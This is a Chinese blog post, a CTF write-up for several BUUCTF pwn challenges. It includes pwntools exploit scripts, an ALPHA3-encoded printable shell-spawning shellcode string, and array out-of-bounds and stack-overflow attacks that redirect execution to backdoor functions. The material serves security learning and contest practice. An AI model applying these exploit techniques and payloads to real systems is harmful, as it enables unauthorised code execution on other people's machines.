mrctf2020_shellcode_revenge|wustctf2020_name_your_cat|2018_gettingStart|SUCTF_2018_stack|wustctf2020

最新推荐文章于 2023-09-29 18:46:02 发布
最新推荐文章于 2023-09-29 18:46:02 发布
阅读量368 收藏
点赞数
分类专栏: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46521144/article/details/115447627
版权

这五道题都异常简单。。。也不知道为啥

wustctf2020_number_game

这题大概是csapp第二章学好了直接连就可以了。

v1=Tmin=-2147483648即可。因为32位有符号整数下Tmin是1000_0000_0000_0000,取反码加上1还是Tmin

 

2018_gettingStart

好吧,这道题还是CSAPP第二章知识直接运用。有一个简单的溢出覆盖,其实是考察浮点的位表示,写个c程序跑一下就出来了

#include<stdio.h>
int main(int argc, char *argv[])
{
  int i;
  unsigned long uf;
  union {
    unsigned long u;
    double f;
  } v;
  v.f=0.1;
  printf("%lx\n",v.u);

  
}

把输出的值放回去就可以了

from pwn import *
# io=process('./2018_gettingStart')
io=remote('node3.buuoj.cn',27403)
io.recvuntil('you.')
payload = 'a'*24+p64(0x7fffffffffffffff)+p64(0x3fb999999999999a)
io.send(payload)
io.interactive()

 

mrctf2020_shellcode_revenge

这道题算是有点意思,首先是ida无法反编译,好啊那流程图都给出来了,能空手bomblab的我还能看不懂逆向?(好我怂了...

emm其实还真的不难,流程是这样的

然后看循环,注意到cnt是loc_1236的[rbp+var_4],被比较的对象在

而rbp+var_8是字符串的长度。

接下来一些比较我举个例子

由此可以得到三个ascii范围,取并集就发现这是在0x60~0x7a并0x2f到0x5a之间

这里要用到一个alpha3的工具,可以将ascii指令变成可见字符,用如下命令将asm(shellcraft.sh())送往alpha3,shellcode是保存shellcraft.sh的文件名

>   python ./ALPHA3.py x64 ascii mixedcase rax --input="shellcode"

 这里参数含义是:x64架构,ascii字符(还可选拉丁什么的)mixedcase:大小写混合(还可以uppercase只有大写)rax:指执行shellcode时被调用的寄存器。比如此时是call rax执行shellcode就写rax

之后放到payload里面就可以了。注意末尾不要写\n或者sendline,会被认为不合法

from pwn import *
context.arch = "amd64"

# f = open("sc.bin","w")
# payload = asm(shellcraft.sh())
# f.write(payload)
# f.close()




io=remote('node3.buuoj.cn',29474)

context.log_level='debug'
io.recv()

payload = 'Ph0666TY1131Xh333311k13XjiV11Hc1ZXYf1TqIHf9kDqW02DqX0D1Hu3M2G0Z2o4H0u0P160Z0g7O0Z0C100y5O3G020B2n060N4q0n2t0B0001010H3S2y0Y0O0n0z01340d2F4y8P115l1n0J0h0a070t'
io.send(payload)


io.interactive()

 wustctf2020_name_your_cat/dog

这题也简单,是一个数组大小越界问题,以前确实是没见过,长见识了

exp(name your cat)

from pwn import *
context.log_level='debug'
# io=process('./wustctf2020_name_your_cat')

io=remote('node3.buuoj.cn',25363)
backdoor = 0x080485CB

# gdb.attach(io,"b *0x080486B1")

io.sendlineafter('>','7')
io.sendlineafter('Give your name plz: ',p32(backdoor))



for i in range (4):
    io.sendlineafter('>','1')
    io.sendlineafter('Give your name plz: ','aaaa')



io.interactive()

越界的原因和写法:

 

name_your_dog

这个和上一题差不多,但是没把数组放在栈上。因此考虑修改got表中的一个数值即可。注意到和.bss上的dog地址差必须是8的倍数,printf不行。选择scanf即可

exp

from pwn import *
context.log_level='debug'
# io=process('./wustctf2020_name_your_dog')
io=remote('node3.buuoj.cn',28763)

# io=remote('node3.buuoj.cn',25363)
backdoor = 0x080485CB

# gdb.attach(io,"b *0x0804871f")

io.sendlineafter('>','-7')
io.sendlineafter('Give your name plz: ',p32(backdoor))



# for i in range (4):
#     io.sendlineafter('>','1')
#     io.sendlineafter('Give your name plz: ','aaaa')



io.interactive()

SUCTF_2018_stack

这题我一开始看到更是感到离谱,什么保护都没开还有一个栈溢出,甚至还有一个明摆的后门。但远程打的时候总是timeout才意识到问题不对

上网看了别人的wp才学到,ubuntu18在程序中有system("/bin/sh")的时候,会检查是否对齐,可以参考这篇文章

所以只需要把backdoor指令的地址往后移动一位就可以了,因为这里没平衡就是末尾是8而不是0,而一条指令的长度就是8.看一下下一条指令是push rbp和/bin/sh关系不大,可以被破坏,就加上1就可以

exp

from pwn import *
# io=process('./SUCTF_2018_stack')
io=remote('node3.buuoj.cn',28911)
backdoor=0x400676

payload = 'a'*0x28+p64(0x400677) #here added 1


io.sendline(payload)


io.interactive()

总之这几道题简单的离谱了。。。虽然还是学到了栈平衡和alpha3这个工具。后者挺有用的因为现实场景中大部分会过滤不可见字符。

 

N1ch0l4s
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
BUUCTF-PWN刷题记录-19
weixin_44145820的博客
05-09 455
目录wustctf2020_name_your_catwustctf2020_name_your_dog wustctf2020_name_your_cat 在NameWhich函数中没有越界检查 我们调试看一下 0xffd31214就是char v3[40]的地址 而在0xffd3124c处就存放着函数返回地址 0xffd3124c-0xffd31214=0x38 0x38/8=7 所以我们name 7 就能修改这个返回地址了 Exp: from pwn import * r = remote
[BUUCTF]PWN——wustctf2020_name_your_cat(数组越界)
mcmuyanga的博客
03-13 1213
wustctf2020_name_your_cat 附件 步骤 例行检查,32位程序,开启了canary和nx 本地试运行一下看看大概的情况 32位ida载入,在检索字符串的时候发现了后门 主要函数
mrctf2020_shellcode_revenge
最新发布
qq_62887641的博客
09-29 1229
64位,开了PIE和RELRO,看到RWX出来,就感觉是shellcode了进入IDA,没法反编译到read这里,就是,并且buf是0x410,没法溢出下面这里,就是判断你输入的是否是可见字符。
mrctf2020_shellcode
z1r0的博客
12-11 1411
mrctf2020_shellcode 查看保护 直接写shellcode就可以了。 from pwn import * context(arch='amd64', os='linux', log_level='debug') file_name = './z1r0' debug = 1 if debug: r = remote('node4.buuoj.cn', 25728) else: r = process(file_name) elf = ELF(file_name)
JMPESP.rar_jmp_jmp esp_jmp9.02 crack_shellcode_sp3 jmp esp
09-24
获取jmp esp地址程序,shellcode编写需要用到
此源代码将生成 linux x86的 shellcode.rar_linux shellcode_shell
09-20
此源代码将生成 linux x86的 shellcode
PDFTear1.1.rar_4 3 2 1_PDFTear1.1
07-15
恶意PDF文档检测工具PDFTear v1.1 功能: 1、恶意PDF文档检测 2、JavaScript解压缩 3、简单异或工具 4、shellcode反汇编 5、PDF关键字段数量提取
ExeShellCode2.rar_加壳 源码_加壳 花指令_加密壳_壳 源码_花指令
07-15
用C语言写壳程序和加壳源码,完全支持Win7,加了一些无意义的花指令、也对壳程序里的函数机器码进行了加密
pe_to_shellcode:将PE转换为Shellcode
05-09
pe_to_shellcode 转换PE,以便可以像普通shellcode一样将其注入。 (同时,输出文件仍然是有效的PE)。 同时支持32位和64位PE 作者: 和 客观的 该项目的目标是提供一种生成PE文件的可能性,该文件可以轻松完成...
[BUUCTF]PWN——mrctf2020_shellcode_revenge(可见字符shellcode
mcmuyanga的博客
03-15 3594
mrctf2020_shellcode_revenge 例行检查,64位程序,开启了RELRO和PIE 本地运行看一下大概的情况 64位ida载入,没法f5,直接看汇编 jg大于则跳转,jl小于则跳转,jump无条件跳转 要让程序继续执行下去,肯定是跳转loc_11AC loc_123A loc_11B8 cdqe使用eax的最高位拓展rax高32位的所有位 movzx则是按无符号数传送+扩展(16-32) EAX是32位的寄存器,而AX是EAX的低16位,AH是ax的高8位,而AL是ax的低
PWN-PRACTICE-BUUCTF-25
P1umH0的博客
09-10 719
PWN-PRACTICE-BUUCTF-25wustctf2020_name_your_catciscn_2019_final_2mrctf2020_shellcode_revengezctf2016_note2 wustctf2020_name_your_cat 通过数组越界写返回地址为后门shell的地址 from pwn import * #io=process('./wustctf2020_name_your_cat') io=remote('node4.buuoj.cn',28864) elf=E
2018SUCTF部分wp
Risker
05-28 2788
趁大佬都去打别的比赛,试了试SUCTF,依旧菜的一批,只做出来两道,GG。WEB:Anonymous:简单粗暴给源码,看着这源码好像在哪看过:没错,2017HITCON改的,只不过难度降低了一大截..把有难度的部分都去掉了。wp参考这里按照步骤操作,这道题只需要做最后的步骤,只考了个匿名函数以及apache的Pre-fork模式默认工作模式。拿了orange大大的脚本改个host就去跑吧,linu...
WUST-CTF2020-WP
夏日 の blog
03-29 5273
目录WEBcheckinadminCV Makereasywebtrain yourself to be godlyMISCSpace ClubWelcomeAlison likes jojoShopgirlfriend小结 WEB checkin 打开页面显示Who’s the author?,回到题目发现作者是52HeRtz,输入52HeRtz发现有截断,f12选中输入框把maxlength改...
zctf_2016_note3
seaaseesa的博客
04-17 771
zctf_2016_note3 首先检查一下程序的保护机制 然后用IDA分析一下,edit里存在一个整数溢出导致堆溢出的漏洞。当输入为0x8000000000000000时,即可使得index为-1,由于输入的长度不够,因此将0x8000000000000000转为负数的形式输入进去即可。然后就是正常的unlink了。 #coding:utf8 from pwn import * ...
BUUCTF-PWN刷题日记(一)
weixin_45461609的博客
04-30 1266
BUUCTF-PWN刷题日记rip rip 简单的栈溢出 #coding=utf-8 from pwn import* #r = process('./pwn1') r = remote('node3.buuoj.cn',26123) sys_addr = 0x401186 #address of fun payload = 'a'*(0xf+8) + p64(sys_addr) r.sendli...
[BUUCTF-pwn]——wustctf2020_name_your_dog
Y_peak的博客
03-10 312
[BUUCTF-pwn]——wustctf2020_name_your_dog 题目地址:https://buuoj.cn/challenges#wustctf2020_name_your_dog checksec看下, 在IDA中看下, 竟然有后门函数,我们只需要执行该函数就好 看完代码发现, 没有什么可以溢出的地方. 唯一可以找到修改一些东西的只有, 这个函数, %7s虽然限定了长度但是足够写进去一个地址了. 看一下它的上一级, 调用发现Dogs在bss段距离got表很近, 意味着我们可以修改
[MRCTF2020] - Web
qtL0ng的博客
07-01 1036
[MRCTF2020]套娃 打开题目查看源码 <!-- //1st $query = $_SERVER['QUERY_STRING']; if( substr_count($query, '_') !== 0 || substr_count($query, '%5f') != 0 ){ die('Y0u are So cutE!'); } if($_GET['b_u_p_t'] !== '23333' && preg_match('/^23333$/', $_GET['b
[BUUCTF][MRCTF2020]部分web wp
cosmoslin的博客
10-11 707
[MRCTF2020]你传你????呢 学习链接:[CTF].htaccess的使用技巧总结 fuzz测试,发现过滤了php后缀,中间件是apache,可以上传png图片马。 思路:利用.htaccess来将png文件当作php文件解析 先上传.htaccess文件,文件解析 AddType application/x-httpd-php .png 然后再上传一个png图片马 最后用蚁剑连接就可以啦! [MRCTF2020]Ez_bypass include 'flag.php'; $flag='MR
others_shellcode
07-28
others_shellcode是一种外部的、已编写好的机器码程序,在计算机系统中用于执行恶意行为,例如攻击、病毒、木马等。它可以被黑客选用,注入到受害者主机的内存中,并被执行。由于others_shellcode本身就是已经准备好...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值